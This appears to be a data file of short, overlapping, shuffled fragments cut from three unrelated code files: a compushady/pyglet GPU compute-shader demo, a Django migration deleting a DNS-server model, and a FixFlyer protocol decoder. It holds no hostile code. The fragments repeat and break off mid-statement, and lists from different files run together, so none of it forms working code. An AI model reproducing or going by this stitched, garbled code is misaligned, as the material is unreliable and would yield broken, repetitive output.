"y = 0 def update(dt): global x, y x += 1 y +=",
"window = pyglet.window.Window() swapchain = Swapchain(window._hwnd, B8G8R8A8_UNORM, 3) target = Texture2D(window.width, window.height, B8G8R8A8_UNORM)",
"3) target = Texture2D(window.width, window.height, B8G8R8A8_UNORM) clear_screen = Compute(hlsl.compile(\"\"\" RWTexture2D<float4> target : register(u0);",
"= Compute(hlsl.compile(\"\"\" struct Quad { uint x; uint y; }; ConstantBuffer<Quad> quad :",
"quad : register(b0); RWTexture2D<float4> target : register(u0); [numthreads(8,8,1)] void main(uint3 tid : SV_DispatchThreadID)",
"1, 1, 1); } \"\"\"), cbv=[constant_buffer], uav=[target]) x = 0 y = 0",
"Swapchain(window._hwnd, B8G8R8A8_UNORM, 3) target = Texture2D(window.width, window.height, B8G8R8A8_UNORM) clear_screen = Compute(hlsl.compile(\"\"\" RWTexture2D<float4> target",
"window.width: x = 0 if y > window.height: y = 0 constant_buffer.upload(struct.pack('II', x,",
": SV_DispatchThreadID) { target[tid.xy] = float4(1, 0, 0, 1); } \"\"\"), uav=[target]) constant_buffer",
"= float4(0, 1, 1, 1); } \"\"\"), cbv=[constant_buffer], uav=[target]) x = 0 y",
"x, y)) @window.event def on_draw(): clear_screen.dispatch(window.width // 8, window.height // 8, 1) quad.dispatch(1,",
"platform.system() != 'Windows': raise Exception('only Windows is supported for this example') window =",
"1 y += 1 if x > window.width: x = 0 if y",
"struct Quad { uint x; uint y; }; ConstantBuffer<Quad> quad : register(b0); RWTexture2D<float4>",
"quad = Compute(hlsl.compile(\"\"\" struct Quad { uint x; uint y; }; ConstantBuffer<Quad> quad",
"update(dt): global x, y x += 1 y += 1 if x >",
"target = Texture2D(window.width, window.height, B8G8R8A8_UNORM) clear_screen = Compute(hlsl.compile(\"\"\" RWTexture2D<float4> target : register(u0); [numthreads(8,8,1)]",
": SV_DispatchThreadID) { target[tid.xy + uint2(quad.x, quad.y)] = float4(0, 1, 1, 1); }",
"void main(uint3 tid : SV_DispatchThreadID) { target[tid.xy + uint2(quad.x, quad.y)] = float4(0, 1,",
"Buffer from compushady.formats import B8G8R8A8_UNORM from compushady.shaders import hlsl if platform.system() != 'Windows':",
"target[tid.xy + uint2(quad.x, quad.y)] = float4(0, 1, 1, 1); } \"\"\"), cbv=[constant_buffer], uav=[target])",
"> window.width: x = 0 if y > window.height: y = 0 constant_buffer.upload(struct.pack('II',",
"constant_buffer.upload(struct.pack('II', x, y)) @window.event def on_draw(): clear_screen.dispatch(window.width // 8, window.height // 8, 1)",
"Compute(hlsl.compile(\"\"\" RWTexture2D<float4> target : register(u0); [numthreads(8,8,1)] void main(uint3 tid : SV_DispatchThreadID) { target[tid.xy]",
"} \"\"\"), uav=[target]) constant_buffer = Buffer(8, HEAP_UPLOAD) quad = Compute(hlsl.compile(\"\"\" struct Quad {",
"B8G8R8A8_UNORM from compushady.shaders import hlsl if platform.system() != 'Windows': raise Exception('only Windows is",
"= 0 y = 0 def update(dt): global x, y x += 1",
"main(uint3 tid : SV_DispatchThreadID) { target[tid.xy] = float4(1, 0, 0, 1); } \"\"\"),",
"main(uint3 tid : SV_DispatchThreadID) { target[tid.xy + uint2(quad.x, quad.y)] = float4(0, 1, 1,",
"y = 0 constant_buffer.upload(struct.pack('II', x, y)) @window.event def on_draw(): clear_screen.dispatch(window.width // 8, window.height",
"x > window.width: x = 0 if y > window.height: y = 0",
"Compute, Texture2D, Buffer from compushady.formats import B8G8R8A8_UNORM from compushady.shaders import hlsl if platform.system()",
"raise Exception('only Windows is supported for this example') window = pyglet.window.Window() swapchain =",
"is supported for this example') window = pyglet.window.Window() swapchain = Swapchain(window._hwnd, B8G8R8A8_UNORM, 3)",
"pyglet import platform import struct from ctypes import addressof,pointer import ctypes from compushady",
"0, 0, 1); } \"\"\"), uav=[target]) constant_buffer = Buffer(8, HEAP_UPLOAD) quad = Compute(hlsl.compile(\"\"\"",
"global x, y x += 1 y += 1 if x > window.width:",
"window.height: y = 0 constant_buffer.upload(struct.pack('II', x, y)) @window.event def on_draw(): clear_screen.dispatch(window.width // 8,",
"from compushady import HEAP_UPLOAD, Swapchain, Compute, Texture2D, Buffer from compushady.formats import B8G8R8A8_UNORM from",
"float4(0, 1, 1, 1); } \"\"\"), cbv=[constant_buffer], uav=[target]) x = 0 y =",
"platform import struct from ctypes import addressof,pointer import ctypes from compushady import HEAP_UPLOAD,",
": register(u0); [numthreads(8,8,1)] void main(uint3 tid : SV_DispatchThreadID) { target[tid.xy + uint2(quad.x, quad.y)]",
"x; uint y; }; ConstantBuffer<Quad> quad : register(b0); RWTexture2D<float4> target : register(u0); [numthreads(8,8,1)]",
"1, 1); } \"\"\"), cbv=[constant_buffer], uav=[target]) x = 0 y = 0 def",
"{ target[tid.xy] = float4(1, 0, 0, 1); } \"\"\"), uav=[target]) constant_buffer = Buffer(8,",
"ctypes import addressof,pointer import ctypes from compushady import HEAP_UPLOAD, Swapchain, Compute, Texture2D, Buffer",
"y += 1 if x > window.width: x = 0 if y >",
"uint x; uint y; }; ConstantBuffer<Quad> quad : register(b0); RWTexture2D<float4> target : register(u0);",
"= 0 def update(dt): global x, y x += 1 y += 1",
"}; ConstantBuffer<Quad> quad : register(b0); RWTexture2D<float4> target : register(u0); [numthreads(8,8,1)] void main(uint3 tid",
"Texture2D(window.width, window.height, B8G8R8A8_UNORM) clear_screen = Compute(hlsl.compile(\"\"\" RWTexture2D<float4> target : register(u0); [numthreads(8,8,1)] void main(uint3",
"addressof,pointer import ctypes from compushady import HEAP_UPLOAD, Swapchain, Compute, Texture2D, Buffer from compushady.formats",
"clear_screen.dispatch(window.width // 8, window.height // 8, 1) quad.dispatch(1, 1, 1) swapchain.present(target) pyglet.clock.schedule_interval(update, 1/120.0)",
"[numthreads(8,8,1)] void main(uint3 tid : SV_DispatchThreadID) { target[tid.xy + uint2(quad.x, quad.y)] = float4(0,",
"= Texture2D(window.width, window.height, B8G8R8A8_UNORM) clear_screen = Compute(hlsl.compile(\"\"\" RWTexture2D<float4> target : register(u0); [numthreads(8,8,1)] void",
"x, y x += 1 y += 1 if x > window.width: x",
"y x += 1 y += 1 if x > window.width: x ="
"('core', 'remove_atmosphereuser_selected_identity'), ] operations = [ migrations.AlterUniqueTogether( name='providerdnsserverip', unique_together=set([]), ), migrations.RemoveField( model_name='providerdnsserverip', name='provider',",
"Django 1.11.4 on 2018-09-07 21:53 from __future__ import unicode_literals from django.db import migrations",
"import migrations class Migration(migrations.Migration): dependencies = [ ('core', 'remove_atmosphereuser_selected_identity'), ] operations = [",
"utf-8 -*- # Generated by Django 1.11.4 on 2018-09-07 21:53 from __future__ import",
"by Django 1.11.4 on 2018-09-07 21:53 from __future__ import unicode_literals from django.db import",
"-*- coding: utf-8 -*- # Generated by Django 1.11.4 on 2018-09-07 21:53 from",
"[ ('core', 'remove_atmosphereuser_selected_identity'), ] operations = [ migrations.AlterUniqueTogether( name='providerdnsserverip', unique_together=set([]), ), migrations.RemoveField( model_name='providerdnsserverip',",
"# Generated by Django 1.11.4 on 2018-09-07 21:53 from __future__ import unicode_literals from",
"] operations = [ migrations.AlterUniqueTogether( name='providerdnsserverip', unique_together=set([]), ), migrations.RemoveField( model_name='providerdnsserverip', name='provider', ), migrations.DeleteModel(name='ProviderDNSServerIP',",
"= [ migrations.AlterUniqueTogether( name='providerdnsserverip', unique_together=set([]), ), migrations.RemoveField( model_name='providerdnsserverip', name='provider', ), migrations.DeleteModel(name='ProviderDNSServerIP', ), ]",
"class Migration(migrations.Migration): dependencies = [ ('core', 'remove_atmosphereuser_selected_identity'), ] operations = [ migrations.AlterUniqueTogether( name='providerdnsserverip',",
"operations = [ migrations.AlterUniqueTogether( name='providerdnsserverip', unique_together=set([]), ), migrations.RemoveField( model_name='providerdnsserverip', name='provider', ), migrations.DeleteModel(name='ProviderDNSServerIP', ),",
"Generated by Django 1.11.4 on 2018-09-07 21:53 from __future__ import unicode_literals from django.db",
"2018-09-07 21:53 from __future__ import unicode_literals from django.db import migrations class Migration(migrations.Migration): dependencies",
"from __future__ import unicode_literals from django.db import migrations class Migration(migrations.Migration): dependencies = [",
"unicode_literals from django.db import migrations class Migration(migrations.Migration): dependencies = [ ('core', 'remove_atmosphereuser_selected_identity'), ]",
"Migration(migrations.Migration): dependencies = [ ('core', 'remove_atmosphereuser_selected_identity'), ] operations = [ migrations.AlterUniqueTogether( name='providerdnsserverip', unique_together=set([]),",
"django.db import migrations class Migration(migrations.Migration): dependencies = [ ('core', 'remove_atmosphereuser_selected_identity'), ] operations =",
"= [ ('core', 'remove_atmosphereuser_selected_identity'), ] operations = [ migrations.AlterUniqueTogether( name='providerdnsserverip', unique_together=set([]), ), migrations.RemoveField(",
"migrations class Migration(migrations.Migration): dependencies = [ ('core', 'remove_atmosphereuser_selected_identity'), ] operations = [ migrations.AlterUniqueTogether(",
"1.11.4 on 2018-09-07 21:53 from __future__ import unicode_literals from django.db import migrations class",
"from django.db import migrations class Migration(migrations.Migration): dependencies = [ ('core', 'remove_atmosphereuser_selected_identity'), ] operations",
"import unicode_literals from django.db import migrations class Migration(migrations.Migration): dependencies = [ ('core', 'remove_atmosphereuser_selected_identity'),",
"'remove_atmosphereuser_selected_identity'), ] operations = [ migrations.AlterUniqueTogether( name='providerdnsserverip', unique_together=set([]), ), migrations.RemoveField( model_name='providerdnsserverip', name='provider', ),",
"21:53 from __future__ import unicode_literals from django.db import migrations class Migration(migrations.Migration): dependencies =",
"-*- # Generated by Django 1.11.4 on 2018-09-07 21:53 from __future__ import unicode_literals",
"coding: utf-8 -*- # Generated by Django 1.11.4 on 2018-09-07 21:53 from __future__",
"__future__ import unicode_literals from django.db import migrations class Migration(migrations.Migration): dependencies = [ ('core',",
"dependencies = [ ('core', 'remove_atmosphereuser_selected_identity'), ] operations = [ migrations.AlterUniqueTogether( name='providerdnsserverip', unique_together=set([]), ),",
"# -*- coding: utf-8 -*- # Generated by Django 1.11.4 on 2018-09-07 21:53",
"on 2018-09-07 21:53 from __future__ import unicode_literals from django.db import migrations class Migration(migrations.Migration):"
"flyer.protocol.LOGON_RESPONSE_EVENT_ID: return self.decode_logon_response_message(msg) elif event_type == flyer.protocol.SESSION_LOGON_EVENT_ID: return self.decode_session_logon_message(msg) elif event_type == flyer.protocol.SESSION_LOGOUT_EVENT_ID:",
"(C) 2017, FixFlyer, LLC. # All rights reserved. # COPYRIGHT_END #----------------------------------------------------------------------- \"\"\"Protocol decoder.\"\"\"",
"dispatch(self, msg): msg_type = getInt32(\"50001=\", msg, \"\\x01\") if msg_type < 0: #FIXME: log",
"= getInt32(\"50011=\", msg, \"\\x01\") if event_type < 0: #FIXME: log return if event_type",
"== flyer.protocol.SESSION_LOGOUT_EVENT_ID: return self.decode_session_logout_message(msg) elif event_type == flyer.protocol.RESEND_EVENT_ID: return self.decode_resend_message(msg) elif event_type ==",
"receive_bytes(self, buf, buflen): self._buf += buf[:buflen] return def get_message(self): pos = self._buf.find(MARKER) if",
"flyer.protocol.COMMON_MESSAGE_TYPE: event_type = getInt32(\"50011=\", msg, \"\\x01\") if event_type < 0: #FIXME: log return",
"== flyer.protocol.SESSION_LOGON_EVENT_ID: return self.decode_session_logon_message(msg) elif event_type == flyer.protocol.SESSION_LOGOUT_EVENT_ID: return self.decode_session_logout_message(msg) elif event_type ==",
"#----------------------------------------------------------------------- \"\"\"Protocol decoder.\"\"\" import flyer MARKER = \"50015=EOF\\x01\" MARKER_LEN = len(MARKER) class Decoder(object):",
"listener return def receive_bytes(self, buf, buflen): self._buf += buf[:buflen] return def get_message(self): pos",
"self.decode_payload_message(msg) elif msg_type == flyer.protocol.HEARTBEAT_MESSAGE_TYPE: return self.decode_heartbeat_message(msg) elif msg_type == flyer.protocol.COMMIT_MESSAGE_TYPE: return self.decode_commit_message(msg)",
"2017, FixFlyer, LLC. # All rights reserved. # COPYRIGHT_END #----------------------------------------------------------------------- \"\"\"Protocol decoder.\"\"\" import",
"\"\\x01\") if msg_type < 0: #FIXME: log return if msg_type == flyer.protocol.PAYLOAD_MESSAGE_TYPE: return",
"#FIXME: log return else: #FIXME: log return def decode_payload_message(self, msg): return def decode_heartbeat_message(self,",
"# Copyright (C) 2017, FixFlyer, LLC. # All rights reserved. # COPYRIGHT_END #-----------------------------------------------------------------------",
"\"true\") self._listener.on_logon(event) return def decode_session_logon_message(self, msg): return def decode_session_logout_message(self, msg): return def decode_resend_message(self,",
"0: #FIXME: log return if msg_type == flyer.protocol.PAYLOAD_MESSAGE_TYPE: return self.decode_payload_message(msg) elif msg_type ==",
"if pos < 0: return msg = self._buf[0:pos + MARKER_LEN] self._buf = self._buf[pos",
"self.decode_resend_message(msg) elif event_type == flyer.protocol.ERROR_EVENT_ID: return self.decode_error_message(msg) else: #FIXME: log return else: #FIXME:",
"All rights reserved. # COPYRIGHT_END #----------------------------------------------------------------------- \"\"\"Protocol decoder.\"\"\" import flyer MARKER = \"50015=EOF\\x01\"",
"if msg_type < 0: #FIXME: log return if msg_type == flyer.protocol.PAYLOAD_MESSAGE_TYPE: return self.decode_payload_message(msg)",
"= len(MARKER) class Decoder(object): \"\"\"Protocol decoder.\"\"\" def __init__(self): self._listener = None self._buf =",
"def receive_bytes(self, buf, buflen): self._buf += buf[:buflen] return def get_message(self): pos = self._buf.find(MARKER)",
"msg): return def decode_heartbeat_message(self, msg): event = OnHeartbeatEvent() event.id = getString(\"50002=\", msg, \"\\x01\")",
"= None self._buf = \"\" return def set_listener(self, listener): self._listener = listener return",
"return self.decode_session_logout_message(msg) elif event_type == flyer.protocol.RESEND_EVENT_ID: return self.decode_resend_message(msg) elif event_type == flyer.protocol.ERROR_EVENT_ID: return",
"= (result == \"true\") self._listener.on_logon(event) return def decode_session_logon_message(self, msg): return def decode_session_logout_message(self, msg):",
"def decode_logon_response_message(self, msg): event = OnLogonEvent() result = getString(\"Success=\", msg, \"\\r\\n\") event.success =",
"elif msg_type == flyer.protocol.COMMIT_MESSAGE_TYPE: return self.decode_commit_message(msg) elif msg_type == flyer.protocol.COMMON_MESSAGE_TYPE: event_type = getInt32(\"50011=\",",
"def decode_payload_message(self, msg): return def decode_heartbeat_message(self, msg): event = OnHeartbeatEvent() event.id = getString(\"50002=\",",
"self._buf[0:pos + MARKER_LEN] self._buf = self._buf[pos + MARKER_LEN:] return msg def dispatch(self, msg):",
"return if event_type == flyer.protocol.LOGON_RESPONSE_EVENT_ID: return self.decode_logon_response_message(msg) elif event_type == flyer.protocol.SESSION_LOGON_EVENT_ID: return self.decode_session_logon_message(msg)",
"self.decode_error_message(msg) else: #FIXME: log return else: #FIXME: log return def decode_payload_message(self, msg): return",
"#! /usr/bin/env python #----------------------------------------------------------------------- # COPYRIGHT_BEGIN # Copyright (C) 2017, FixFlyer, LLC. #",
"msg, \"\\r\\n\") event.success = (result == \"true\") self._listener.on_logon(event) return def decode_session_logon_message(self, msg): return",
"self._buf.find(MARKER) if pos < 0: return msg = self._buf[0:pos + MARKER_LEN] self._buf =",
"pos < 0: return msg = self._buf[0:pos + MARKER_LEN] self._buf = self._buf[pos +",
"flyer.protocol.COMMIT_MESSAGE_TYPE: return self.decode_commit_message(msg) elif msg_type == flyer.protocol.COMMON_MESSAGE_TYPE: event_type = getInt32(\"50011=\", msg, \"\\x01\") if",
"= getString(\"Success=\", msg, \"\\r\\n\") event.success = (result == \"true\") self._listener.on_logon(event) return def decode_session_logon_message(self,",
"event = OnLogonEvent() result = getString(\"Success=\", msg, \"\\r\\n\") event.success = (result == \"true\")",
"= self._buf[0:pos + MARKER_LEN] self._buf = self._buf[pos + MARKER_LEN:] return msg def dispatch(self,",
"return msg = self._buf[0:pos + MARKER_LEN] self._buf = self._buf[pos + MARKER_LEN:] return msg",
"return def decode_heartbeat_message(self, msg): event = OnHeartbeatEvent() event.id = getString(\"50002=\", msg, \"\\x01\") self._listener.on_heartbeat(event)",
"self.decode_commit_message(msg) elif msg_type == flyer.protocol.COMMON_MESSAGE_TYPE: event_type = getInt32(\"50011=\", msg, \"\\x01\") if event_type <",
"<gh_stars>1-10 #! /usr/bin/env python #----------------------------------------------------------------------- # COPYRIGHT_BEGIN # Copyright (C) 2017, FixFlyer, LLC.",
"msg): event = OnLogonEvent() result = getString(\"Success=\", msg, \"\\r\\n\") event.success = (result ==",
"msg): return def decode_session_logout_message(self, msg): return def decode_resend_message(self, msg): return def decode_error_message(self, msg):",
"elif msg_type == flyer.protocol.HEARTBEAT_MESSAGE_TYPE: return self.decode_heartbeat_message(msg) elif msg_type == flyer.protocol.COMMIT_MESSAGE_TYPE: return self.decode_commit_message(msg) elif",
"listener): self._listener = listener return def receive_bytes(self, buf, buflen): self._buf += buf[:buflen] return",
"== flyer.protocol.COMMIT_MESSAGE_TYPE: return self.decode_commit_message(msg) elif msg_type == flyer.protocol.COMMON_MESSAGE_TYPE: event_type = getInt32(\"50011=\", msg, \"\\x01\")",
"event_type == flyer.protocol.SESSION_LOGOUT_EVENT_ID: return self.decode_session_logout_message(msg) elif event_type == flyer.protocol.RESEND_EVENT_ID: return self.decode_resend_message(msg) elif event_type",
"flyer.protocol.PAYLOAD_MESSAGE_TYPE: return self.decode_payload_message(msg) elif msg_type == flyer.protocol.HEARTBEAT_MESSAGE_TYPE: return self.decode_heartbeat_message(msg) elif msg_type == flyer.protocol.COMMIT_MESSAGE_TYPE:",
"getString(\"50002=\", msg, \"\\x01\") self._listener.on_heartbeat(event) return def decode_commit_message(self, msg): return def decode_logon_response_message(self, msg): event",
"msg_type == flyer.protocol.HEARTBEAT_MESSAGE_TYPE: return self.decode_heartbeat_message(msg) elif msg_type == flyer.protocol.COMMIT_MESSAGE_TYPE: return self.decode_commit_message(msg) elif msg_type",
"0: #FIXME: log return if event_type == flyer.protocol.LOGON_RESPONSE_EVENT_ID: return self.decode_logon_response_message(msg) elif event_type ==",
"return self.decode_resend_message(msg) elif event_type == flyer.protocol.ERROR_EVENT_ID: return self.decode_error_message(msg) else: #FIXME: log return else:",
"else: #FIXME: log return def decode_payload_message(self, msg): return def decode_heartbeat_message(self, msg): event =",
"MARKER_LEN = len(MARKER) class Decoder(object): \"\"\"Protocol decoder.\"\"\" def __init__(self): self._listener = None self._buf",
"return def decode_payload_message(self, msg): return def decode_heartbeat_message(self, msg): event = OnHeartbeatEvent() event.id =",
"+= buf[:buflen] return def get_message(self): pos = self._buf.find(MARKER) if pos < 0: return",
"== flyer.protocol.PAYLOAD_MESSAGE_TYPE: return self.decode_payload_message(msg) elif msg_type == flyer.protocol.HEARTBEAT_MESSAGE_TYPE: return self.decode_heartbeat_message(msg) elif msg_type ==",
"(result == \"true\") self._listener.on_logon(event) return def decode_session_logon_message(self, msg): return def decode_session_logout_message(self, msg): return",
"self._buf[pos + MARKER_LEN:] return msg def dispatch(self, msg): msg_type = getInt32(\"50001=\", msg, \"\\x01\")",
"msg_type = getInt32(\"50001=\", msg, \"\\x01\") if msg_type < 0: #FIXME: log return if",
"elif event_type == flyer.protocol.RESEND_EVENT_ID: return self.decode_resend_message(msg) elif event_type == flyer.protocol.ERROR_EVENT_ID: return self.decode_error_message(msg) else:",
"elif event_type == flyer.protocol.ERROR_EVENT_ID: return self.decode_error_message(msg) else: #FIXME: log return else: #FIXME: log",
"event_type == flyer.protocol.LOGON_RESPONSE_EVENT_ID: return self.decode_logon_response_message(msg) elif event_type == flyer.protocol.SESSION_LOGON_EVENT_ID: return self.decode_session_logon_message(msg) elif event_type",
"#FIXME: log return if event_type == flyer.protocol.LOGON_RESPONSE_EVENT_ID: return self.decode_logon_response_message(msg) elif event_type == flyer.protocol.SESSION_LOGON_EVENT_ID:",
"< 0: return msg = self._buf[0:pos + MARKER_LEN] self._buf = self._buf[pos + MARKER_LEN:]",
"msg = self._buf[0:pos + MARKER_LEN] self._buf = self._buf[pos + MARKER_LEN:] return msg def",
"< 0: #FIXME: log return if event_type == flyer.protocol.LOGON_RESPONSE_EVENT_ID: return self.decode_logon_response_message(msg) elif event_type",
"event.success = (result == \"true\") self._listener.on_logon(event) return def decode_session_logon_message(self, msg): return def decode_session_logout_message(self,",
"flyer.protocol.RESEND_EVENT_ID: return self.decode_resend_message(msg) elif event_type == flyer.protocol.ERROR_EVENT_ID: return self.decode_error_message(msg) else: #FIXME: log return",
"self._listener.on_heartbeat(event) return def decode_commit_message(self, msg): return def decode_logon_response_message(self, msg): event = OnLogonEvent() result",
"msg_type == flyer.protocol.COMMIT_MESSAGE_TYPE: return self.decode_commit_message(msg) elif msg_type == flyer.protocol.COMMON_MESSAGE_TYPE: event_type = getInt32(\"50011=\", msg,",
"self._listener = None self._buf = \"\" return def set_listener(self, listener): self._listener = listener",
"\"\\x01\") self._listener.on_heartbeat(event) return def decode_commit_message(self, msg): return def decode_logon_response_message(self, msg): event = OnLogonEvent()",
"/usr/bin/env python #----------------------------------------------------------------------- # COPYRIGHT_BEGIN # Copyright (C) 2017, FixFlyer, LLC. # All",
"def set_listener(self, listener): self._listener = listener return def receive_bytes(self, buf, buflen): self._buf +=",
"return self.decode_session_logon_message(msg) elif event_type == flyer.protocol.SESSION_LOGOUT_EVENT_ID: return self.decode_session_logout_message(msg) elif event_type == flyer.protocol.RESEND_EVENT_ID: return",
"flyer.protocol.SESSION_LOGOUT_EVENT_ID: return self.decode_session_logout_message(msg) elif event_type == flyer.protocol.RESEND_EVENT_ID: return self.decode_resend_message(msg) elif event_type == flyer.protocol.ERROR_EVENT_ID:",
"< 0: #FIXME: log return if msg_type == flyer.protocol.PAYLOAD_MESSAGE_TYPE: return self.decode_payload_message(msg) elif msg_type",
"Copyright (C) 2017, FixFlyer, LLC. # All rights reserved. # COPYRIGHT_END #----------------------------------------------------------------------- \"\"\"Protocol",
"\"50015=EOF\\x01\" MARKER_LEN = len(MARKER) class Decoder(object): \"\"\"Protocol decoder.\"\"\" def __init__(self): self._listener = None",
"decoder.\"\"\" import flyer MARKER = \"50015=EOF\\x01\" MARKER_LEN = len(MARKER) class Decoder(object): \"\"\"Protocol decoder.\"\"\"",
"def decode_session_logon_message(self, msg): return def decode_session_logout_message(self, msg): return def decode_resend_message(self, msg): return def",
"# COPYRIGHT_END #----------------------------------------------------------------------- \"\"\"Protocol decoder.\"\"\" import flyer MARKER = \"50015=EOF\\x01\" MARKER_LEN = len(MARKER)",
"event = OnHeartbeatEvent() event.id = getString(\"50002=\", msg, \"\\x01\") self._listener.on_heartbeat(event) return def decode_commit_message(self, msg):",
"log return else: #FIXME: log return def decode_payload_message(self, msg): return def decode_heartbeat_message(self, msg):",
"return def decode_logon_response_message(self, msg): event = OnLogonEvent() result = getString(\"Success=\", msg, \"\\r\\n\") event.success",
"COPYRIGHT_END #----------------------------------------------------------------------- \"\"\"Protocol decoder.\"\"\" import flyer MARKER = \"50015=EOF\\x01\" MARKER_LEN = len(MARKER) class",
"decoder.\"\"\" def __init__(self): self._listener = None self._buf = \"\" return def set_listener(self, listener):",
"buf[:buflen] return def get_message(self): pos = self._buf.find(MARKER) if pos < 0: return msg",
"log return if msg_type == flyer.protocol.PAYLOAD_MESSAGE_TYPE: return self.decode_payload_message(msg) elif msg_type == flyer.protocol.HEARTBEAT_MESSAGE_TYPE: return",
"return def decode_commit_message(self, msg): return def decode_logon_response_message(self, msg): event = OnLogonEvent() result =",
"len(MARKER) class Decoder(object): \"\"\"Protocol decoder.\"\"\" def __init__(self): self._listener = None self._buf = \"\"",
"elif event_type == flyer.protocol.SESSION_LOGOUT_EVENT_ID: return self.decode_session_logout_message(msg) elif event_type == flyer.protocol.RESEND_EVENT_ID: return self.decode_resend_message(msg) elif",
"flyer.protocol.SESSION_LOGON_EVENT_ID: return self.decode_session_logon_message(msg) elif event_type == flyer.protocol.SESSION_LOGOUT_EVENT_ID: return self.decode_session_logout_message(msg) elif event_type == flyer.protocol.RESEND_EVENT_ID:",
"else: #FIXME: log return else: #FIXME: log return def decode_payload_message(self, msg): return def",
"== flyer.protocol.ERROR_EVENT_ID: return self.decode_error_message(msg) else: #FIXME: log return else: #FIXME: log return def",
"__init__(self): self._listener = None self._buf = \"\" return def set_listener(self, listener): self._listener =",
"MARKER_LEN:] return msg def dispatch(self, msg): msg_type = getInt32(\"50001=\", msg, \"\\x01\") if msg_type",
"= getInt32(\"50001=\", msg, \"\\x01\") if msg_type < 0: #FIXME: log return if msg_type",
"msg, \"\\x01\") if msg_type < 0: #FIXME: log return if msg_type == flyer.protocol.PAYLOAD_MESSAGE_TYPE:",
"set_listener(self, listener): self._listener = listener return def receive_bytes(self, buf, buflen): self._buf += buf[:buflen]",
"event_type == flyer.protocol.ERROR_EVENT_ID: return self.decode_error_message(msg) else: #FIXME: log return else: #FIXME: log return",
"#FIXME: log return def decode_payload_message(self, msg): return def decode_heartbeat_message(self, msg): event = OnHeartbeatEvent()",
"pos = self._buf.find(MARKER) if pos < 0: return msg = self._buf[0:pos + MARKER_LEN]",
"msg_type == flyer.protocol.PAYLOAD_MESSAGE_TYPE: return self.decode_payload_message(msg) elif msg_type == flyer.protocol.HEARTBEAT_MESSAGE_TYPE: return self.decode_heartbeat_message(msg) elif msg_type",
"= \"\" return def set_listener(self, listener): self._listener = listener return def receive_bytes(self, buf,",
"def decode_commit_message(self, msg): return def decode_logon_response_message(self, msg): event = OnLogonEvent() result = getString(\"Success=\",",
"getInt32(\"50001=\", msg, \"\\x01\") if msg_type < 0: #FIXME: log return if msg_type ==",
"rights reserved. # COPYRIGHT_END #----------------------------------------------------------------------- \"\"\"Protocol decoder.\"\"\" import flyer MARKER = \"50015=EOF\\x01\" MARKER_LEN",
"class Decoder(object): \"\"\"Protocol decoder.\"\"\" def __init__(self): self._listener = None self._buf = \"\" return",
"MARKER_LEN] self._buf = self._buf[pos + MARKER_LEN:] return msg def dispatch(self, msg): msg_type =",
"def dispatch(self, msg): msg_type = getInt32(\"50001=\", msg, \"\\x01\") if msg_type < 0: #FIXME:",
"return self.decode_commit_message(msg) elif msg_type == flyer.protocol.COMMON_MESSAGE_TYPE: event_type = getInt32(\"50011=\", msg, \"\\x01\") if event_type",
"reserved. # COPYRIGHT_END #----------------------------------------------------------------------- \"\"\"Protocol decoder.\"\"\" import flyer MARKER = \"50015=EOF\\x01\" MARKER_LEN =",
"return def receive_bytes(self, buf, buflen): self._buf += buf[:buflen] return def get_message(self): pos =",
"msg, \"\\x01\") if event_type < 0: #FIXME: log return if event_type == flyer.protocol.LOGON_RESPONSE_EVENT_ID:",
"self.decode_heartbeat_message(msg) elif msg_type == flyer.protocol.COMMIT_MESSAGE_TYPE: return self.decode_commit_message(msg) elif msg_type == flyer.protocol.COMMON_MESSAGE_TYPE: event_type =",
"= \"50015=EOF\\x01\" MARKER_LEN = len(MARKER) class Decoder(object): \"\"\"Protocol decoder.\"\"\" def __init__(self): self._listener =",
"event_type == flyer.protocol.SESSION_LOGON_EVENT_ID: return self.decode_session_logon_message(msg) elif event_type == flyer.protocol.SESSION_LOGOUT_EVENT_ID: return self.decode_session_logout_message(msg) elif event_type",
"getString(\"Success=\", msg, \"\\r\\n\") event.success = (result == \"true\") self._listener.on_logon(event) return def decode_session_logon_message(self, msg):",
"return else: #FIXME: log return def decode_payload_message(self, msg): return def decode_heartbeat_message(self, msg): event",
"decode_session_logon_message(self, msg): return def decode_session_logout_message(self, msg): return def decode_resend_message(self, msg): return def decode_error_message(self,",
"= self._buf[pos + MARKER_LEN:] return msg def dispatch(self, msg): msg_type = getInt32(\"50001=\", msg,",
"buflen): self._buf += buf[:buflen] return def get_message(self): pos = self._buf.find(MARKER) if pos <",
"return self.decode_payload_message(msg) elif msg_type == flyer.protocol.HEARTBEAT_MESSAGE_TYPE: return self.decode_heartbeat_message(msg) elif msg_type == flyer.protocol.COMMIT_MESSAGE_TYPE: return",
"getInt32(\"50011=\", msg, \"\\x01\") if event_type < 0: #FIXME: log return if event_type ==",
"flyer.protocol.HEARTBEAT_MESSAGE_TYPE: return self.decode_heartbeat_message(msg) elif msg_type == flyer.protocol.COMMIT_MESSAGE_TYPE: return self.decode_commit_message(msg) elif msg_type == flyer.protocol.COMMON_MESSAGE_TYPE:",
"msg, \"\\x01\") self._listener.on_heartbeat(event) return def decode_commit_message(self, msg): return def decode_logon_response_message(self, msg): event =",
"if event_type < 0: #FIXME: log return if event_type == flyer.protocol.LOGON_RESPONSE_EVENT_ID: return self.decode_logon_response_message(msg)",
"decode_commit_message(self, msg): return def decode_logon_response_message(self, msg): event = OnLogonEvent() result = getString(\"Success=\", msg,",
"msg def dispatch(self, msg): msg_type = getInt32(\"50001=\", msg, \"\\x01\") if msg_type < 0:",
"return def set_listener(self, listener): self._listener = listener return def receive_bytes(self, buf, buflen): self._buf",
"return self.decode_heartbeat_message(msg) elif msg_type == flyer.protocol.COMMIT_MESSAGE_TYPE: return self.decode_commit_message(msg) elif msg_type == flyer.protocol.COMMON_MESSAGE_TYPE: event_type",
"log return if event_type == flyer.protocol.LOGON_RESPONSE_EVENT_ID: return self.decode_logon_response_message(msg) elif event_type == flyer.protocol.SESSION_LOGON_EVENT_ID: return",
"event.id = getString(\"50002=\", msg, \"\\x01\") self._listener.on_heartbeat(event) return def decode_commit_message(self, msg): return def decode_logon_response_message(self,",
"== flyer.protocol.LOGON_RESPONSE_EVENT_ID: return self.decode_logon_response_message(msg) elif event_type == flyer.protocol.SESSION_LOGON_EVENT_ID: return self.decode_session_logon_message(msg) elif event_type ==",
"None self._buf = \"\" return def set_listener(self, listener): self._listener = listener return def",
"msg): msg_type = getInt32(\"50001=\", msg, \"\\x01\") if msg_type < 0: #FIXME: log return",
"== \"true\") self._listener.on_logon(event) return def decode_session_logon_message(self, msg): return def decode_session_logout_message(self, msg): return def",
